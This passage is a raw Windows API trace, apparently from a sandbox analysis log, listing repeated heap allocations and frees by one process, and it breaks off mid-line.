RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x13200) returned 0x24d6930 [0087.566] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x13200) returned 0x24e9b40 [0087.566] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x13200) returned 0x24fcd50 [0087.566] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x13200) returned 0x250ff60 [0087.567] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x13200) returned 0x2523170 [0087.567] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x468) returned 0x51c5c0 [0087.567] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x508ae0 | out: hHeap=0x4f0000) returned 1 [0087.567] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x13200) returned 0x2536380 [0087.567] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x13200) returned 0x2549590 [0087.568] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x13200) returned 0x255c7a0 [0087.568] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x13200) returned 0x256f9b0 [0087.568] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x13200) returned 0x2582bc0 [0087.569] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x13200) returned 0x25a0080 [0087.570] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x13200) returned 0x25b3290 [0087.570] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x13200) returned 0x25c64a0 [0087.570] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x13200) returned 0x25d96b0 [0087.571] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x13200) returned 0x25ec8c0 [0087.571] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x13200) returned 0x25ffad0 [0087.572] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x13200) returned 0x2612ce0 [0087.572] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x13200) returned 0x2625ef0 [0087.573] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x13200) returned 0x2639100 [0087.573] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x13200) returned 0x264c310 [0087.573] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x13200) returned 0x265f520 [0087.574] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x13200) returned 0x2672730 [0087.574] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x13200) returned 0x2685940 [0087.575] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x13200) returned 0x2698b50 [0087.575] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x13200) returned 0x26abd60 [0087.576] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x13200) returned 0x26bef70 [0087.576] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x13200) returned 0x26d2180 [0087.576] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x13200) returned 0x26e5390 [0087.577] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x13200) returned 0x26f85a0 [0087.577] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x13200) returned 0x270b7b0 [0087.578] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x13200) returned 0x271e9c0 [0087.578] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x13200) returned 0x2731bd0 [0087.578] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x13200) returned 0x2744de0 [0087.578] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x13200) returned 0x2757ff0 [0087.579] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x13200) returned 0x276b200 [0087.580] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x13200) returned 0x277e410 [0087.580] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x13200) returned 0x2791620 [0087.580] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x13200) returned 0x27a4830 [0087.581] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x13200) returned 0x27b7a40 [0087.871] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x13200) returned 0x27cac50 [0087.871] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x13200) returned 0x27dde60 [0087.871] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x13200) returned 0x27f1070 [0087.872] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x13200) returned 0x2804280 [0087.872] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x13200) returned 0x2817490 [0087.873] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x13200) returned 0x282a6a0 [0087.873] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x13200) returned 0x283d8b0 [0087.874] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x13200) returned 0x2850ac0 [0087.874] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x13200) returned 0x2863cd0 [0087.874] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x13200) returned 0x2876ee0 [0087.875] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x13200) returned 0x288a0f0 [0087.875] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x13200) returned 0x289d300 [0087.876] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x13200) returned 0x28b0510 [0087.876] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x698) returned 0x5088e0 [0087.876] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x51c5c0 | out: hHeap=0x4f0000) returned 1 [0087.876] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x13200) returned 0x28c3720 [0087.877] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x13200) returned 0x28d6930 [0087.877] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x13200) returned 0x28e9b40 [0087.877] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x13200) returned 0x28fcd50 [0087.878] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x13200) returned 0x290ff60 [0087.878] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x13200) returned 0x2923170 [0087.879] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x13200) returned 0x2936380 [0087.879] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x13200) returned 0x2949590 [0087.879] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x13200) returned 0x295c7a0 [0087.880] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x13200) returned 0x296f9b0 [0087.880] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x13200) returned 0x2982bc0 [0087.880] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x13200) returned 0x2995dd0 [0087.881] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x13200) returned 0x29a8fe0 [0087.881] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x13200) returned 0x29bc1f0 [0087.881] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x13200) returned 0x29cf400 [0087.882] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x13200) returned 0x29e2610 [0087.882] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x13200) returned 0x29f5820 [0087.882] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x13200) returned 0x2a08a30 [0087.883] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x13200) returned 0x2a1bc40 [0087.883] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x13200) returned 0x2a2ee50 [0087.883] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x13200) returned 0x2a42060 [0087.884] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x13200) returned 0x2a55270 [0087.884] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x13200) returned 0x2a68480 [0087.884] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x13200) returned 0x2a7b690 [0087.885] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x13200) returned 0x2a8e8a0 [0087.885] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x13200) returned 0x2aa1ab0 [0087.885] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x13200) returned 0x2ab4cc0 [0087.885] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x13200) returned 0x2ac7ed0 [0087.886] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x13200) returned 0x2adb0e0 [0087.886] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x13200) returned 0x2aee2f0 [0087.886] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x13200) returned 0x2b01500 [0087.887] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x13200) returned 0x2b14710 [0087.887] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x13200) returned 0x2b27920 [0087.887] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x13200) returned 0x2b3ab30 [0087.888] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x13200) returned 0x2b4dd40 [0087.888] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x13200) returned 0x2b60f50 [0087.888] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x13200) returned 0x2b74160 [0087.889] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x13200) returned 0x2b87370 [0087.889] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x13200) returned 0x2b9a580 [0087.889] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x13200) returned 0x2bad790 [0087.890] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x13200) returned 0x2bc09a0 [0087.890] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x13200) returned 0x2bd3bb0 [0087.891] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x13200) returned 0x2be6dc0 [0087.891] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x13200) returned 0x2bf9fd0 [0087.892] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x13200) returned 0x2c0d1e0 [0087.892] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x13200) returned 0x2c203f0 [0087.892] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x13200) returned 0x2c33600 [0087.893] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x13200) returned 0x2c46810 [0087.893] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x13200) returned 0x2c59a20 [0087.893] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x13200) returned 0x2c6cc30 [0087.894] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x13200) returned 0x2c7fe40 [0087.894] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x13200) returned 0x2c93050 [0087.895] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x13200) returned 0x2ca6260 [0087.895] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x13200) returned 0x2cb9470 [0087.897] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x13200) returned 0x2ccc680 [0087.897] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x13200) returned 0x2cdf890 [0087.898] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x13200) returned 0x2cf2aa0 [0087.898] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x13200) returned 0x2d05cb0 [0087.898] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x13200) returned 0x2d18ec0 [0087.899] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x13200) returned 0x2d2c0d0 [0087.899] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x13200) returned 0x2d3f2e0 [0087.900] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x13200) returned 0x2d524f0 [0087.900] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x13200) returned 0x2d65700 [0087.900] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x13200) returned 0x2d78910 [0087.901] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x13200) returned 0x2da0080 [0087.902] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x13200) returned 0x2db3290 [0087.903] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x13200) returned 0x2dc64a0 [0087.903] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x13200) returned 0x2dd96b0 [0087.904] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x13200) returned 0x2dec8c0 [0087.904] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x13200) returned 0x2dffad0 [0087.905] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x9e0) returned 0x51c5c0 [0087.905] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x5088e0 | out: hHeap=0x4f0000) returned 1 [0087.905] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x13200) returned 0x2e12ce0 [0087.905] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x13200) returned 0x2e25ef0 [0087.905] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x13200) returned 0x2e39100 [0087.906] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x13200) returned 0x2e4c310 [0088.098] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x13200) returned 0x2e5f520 [0088.098] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x13200) returned 0x2e72730 [0088.099] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x13200) returned 0x2e85940 [0088.099] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x13200) returned 0x2e98b50 [0088.100] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x13200) returned 0x2eabd60 [0088.100] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x13200) returned 0x2ebef70 [0088.100] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x13200) returned 0x2ed2180 [0088.101] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x13200) returned 0x2ee5390 [0088.101] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x13200) returned 0x2ef85a0 [0088.102] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x13200) returned 0x2f0b7b0 [0088.102] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x13200) returned 0x2f1e9c0 [0088.126] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x51c5c0 | out: hHeap=0x4f0000) returned 1 [0093.824] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x527450 | out: hHeap=0x4f0000) returned 1 [0093.824] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x547250 | out: hHeap=0x4f0000) returned 1 [0093.824] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x55a460 | out: hHeap=0x4f0000) returned 1 [0093.824] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x56d670 | out: hHeap=0x4f0000) returned 1 [0093.824] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x580880 | out: hHeap=0x4f0000) returned 1 [0093.824] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x593a90 | out: hHeap=0x4f0000) returned 1 [0093.824] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x5a6ca0 | out: hHeap=0x4f0000) returned 1 [0093.824] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x5b9eb0 | out: hHeap=0x4f0000) returned 1 [0093.825] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x5cd0c0 | out: hHeap=0x4f0000) returned 1 [0093.825] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x1e10080 | out: hHeap=0x4f0000) returned 1 [0093.825] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x1e23290 | out: hHeap=0x4f0000) returned 1 [0093.825] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x1e364a0 | out: hHeap=0x4f0000) returned 1 [0093.825] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x1e496b0 | out: hHeap=0x4f0000) returned 1 [0093.825] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x1e5c8c0 | out: hHeap=0x4f0000) returned 1 [0093.825] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x1e6fad0 | out: hHeap=0x4f0000) returned 1 [0093.825] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x1e82ce0 | out: hHeap=0x4f0000) returned 1 [0093.825] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x1e95ef0 | out: hHeap=0x4f0000) returned 1 [0093.825] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x1ea9100 | out: hHeap=0x4f0000) returned 1 [0093.825] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x1ebc310 | out: hHeap=0x4f0000) returned 1 [0093.825] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x1ecf520 | out: hHeap=0x4f0000) returned 1 [0093.825] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x1ee2730 | out: hHeap=0x4f0000) returned 1 [0093.825] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x1fa0080 | out: hHeap=0x4f0000) returned 1 [0093.825] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x1fb3290 | out: hHeap=0x4f0000) returned 1 [0093.825] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x1fc64a0 | out: hHeap=0x4f0000) returned 1 [0093.825] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x1fd96b0 | out: hHeap=0x4f0000) returned 1 [0093.825] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x1fec8c0 | out: hHeap=0x4f0000) returned 1 [0093.835] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x1fffad0 | out: hHeap=0x4f0000) returned 1 [0093.837] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x2012ce0 | out: hHeap=0x4f0000) returned 1 [0093.837] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x2025ef0 | out: hHeap=0x4f0000) returned 1 [0093.837] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x2039100 | out: hHeap=0x4f0000) returned 1 [0093.837] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x204c310 | out: hHeap=0x4f0000) returned 1 [0093.837] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x205f520 | out: hHeap=0x4f0000) returned 1 [0093.837] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x2072730 | out: hHeap=0x4f0000) returned 1 [0093.837] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x2085940 | out: hHeap=0x4f0000) returned 1 [0093.837] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x2098b50 | out: hHeap=0x4f0000) returned 1 [0093.841] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x20abd60 | out: hHeap=0x4f0000) returned 1 [0093.841] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x20bef70 | out: hHeap=0x4f0000) returned 1 [0093.841] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x20d2180 | out: hHeap=0x4f0000) returned 1 [0093.841] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x20e5390 | out: hHeap=0x4f0000) returned 1 [0093.841] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x20f85a0 | out: hHeap=0x4f0000) returned 1 [0093.841] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x210b7b0 | out: hHeap=0x4f0000) returned 1 [0093.841] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x211e9c0 | out: hHeap=0x4f0000) returned 1 [0093.841] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x2131bd0 | out: hHeap=0x4f0000) returned 1 [0093.841] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x2144de0 | out: hHeap=0x4f0000) returned 1 [0093.841] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x2157ff0 | out: hHeap=0x4f0000) returned 1 [0093.841] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x216b200 | out: hHeap=0x4f0000) returned 1 [0093.841] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x217e410 | out: hHeap=0x4f0000) returned 1 [0093.841] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x21a0080 | out: hHeap=0x4f0000) returned 1 [0093.841] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x21b3290 | out: hHeap=0x4f0000) returned 1 [0094.027] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x21c64a0 | out: hHeap=0x4f0000) returned 1 [0094.028] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x21d96b0 | out: hHeap=0x4f0000) returned 1 [0094.028] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x21ec8c0 | out: hHeap=0x4f0000) returned 1 [0094.028] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x21ffad0 | out: hHeap=0x4f0000) returned 1 [0094.028] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x2212ce0 | out: hHeap=0x4f0000) returned 1 [0094.028] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x2225ef0 | out: hHeap=0x4f0000) returned 1 [0094.028] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x2239100 | out: hHeap=0x4f0000) returned 1 [0094.028] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x224c310 | out: hHeap=0x4f0000) returned 1 [0094.028] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x225f520 | out: hHeap=0x4f0000) returned 1 [0094.028] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x2272730 | out: hHeap=0x4f0000) returned 1 [0094.028] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x2285940 | out: hHeap=0x4f0000) returned 1 [0094.028] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x2298b50 | out: hHeap=0x4f0000) returned 1 [0094.033] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x22abd60 | out: hHeap=0x4f0000) returned 1 [0094.033] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x22bef70 | out: hHeap=0x4f0000) returned 1 [0094.033] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x22d2180 | out: hHeap=0x4f0000) returned 1 [0094.033] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x22e5390 | out: hHeap=0x4f0000) returned 1 [0094.033] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x22f85a0 | out: hHeap=0x4f0000) returned 1 [0094.033] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x230b7b0 | out: hHeap=0x4f0000) returned 1 [0094.034] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x231e9c0 | out: hHeap=0x4f0000) returned 1 [0094.034] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x2331bd0 | out: hHeap=0x4f0000) returned 1 [0094.034] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x2344de0 | out: hHeap=0x4f0000) returned 1 [0094.034] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x2357ff0 | out: hHeap=0x4f0000) returned 1 [0094.038] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x236b200 | out: hHeap=0x4f0000) returned 1 [0094.040] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x237e410 | out: hHeap=0x4f0000) returned 1 [0094.040] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x2391620 | out: hHeap=0x4f0000) returned 1 [0094.040] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x23a4830 | out: hHeap=0x4f0000) returned 1 [0094.044] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x23b7a40 | out: hHeap=0x4f0000) returned 1 [0094.044] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x23cac50 | out: hHeap=0x4f0000) returned 1 [0094.044] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x23dde60 | out: hHeap=0x4f0000) returned 1 [0094.044] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x23f1070 | out: hHeap=0x4f0000) returned 1 [0094.044] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x2404280 | out: hHeap=0x4f0000) returned 1 [0094.044] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x2417490 | out: hHeap=0x4f0000) returned 1 [0094.044] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x242a6a0 | out: hHeap=0x4f0000) returned 1 [0094.044] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x243d8b0 | out: hHeap=0x4f0000) returned 1 [0094.044] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x2450ac0 | out: hHeap=0x4f0000) returned 1 [0094.044] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x2463cd0 | out: hHeap=0x4f0000) returned 1 [0094.045] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x2476ee0 | out: hHeap=0x4f0000) returned 1 [0094.045] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x248a0f0 | out: hHeap=0x4f0000) returned 1 [0094.045] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x249d300 | out: hHeap=0x4f0000) returned 1 [0094.045] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x24b0510 | out: hHeap=0x4f0000) returned 1 [0094.050] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x24c3720 | out: hHeap=0x4f0000) returned 1 [0094.050] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x24d6930 | out: hHeap=0x4f0000) returned 1 [0094.051] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x24e9b40 | out: hHeap=0x4f0000) returned 1 [0094.052] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x24fcd50 | out: hHeap=0x4f0000) returned 1 [0094.052] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x250ff60 | out: hHeap=0x4f0000) returned 1 [0094.052] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x2523170 | out: hHeap=0x4f0000) returned 1 [0094.052] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x2536380 | out: hHeap=0x4f0000) returned 1 [0094.052] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x2549590 | out: hHeap=0x4f0000) returned 1 [0094.052] HeapFree (in: 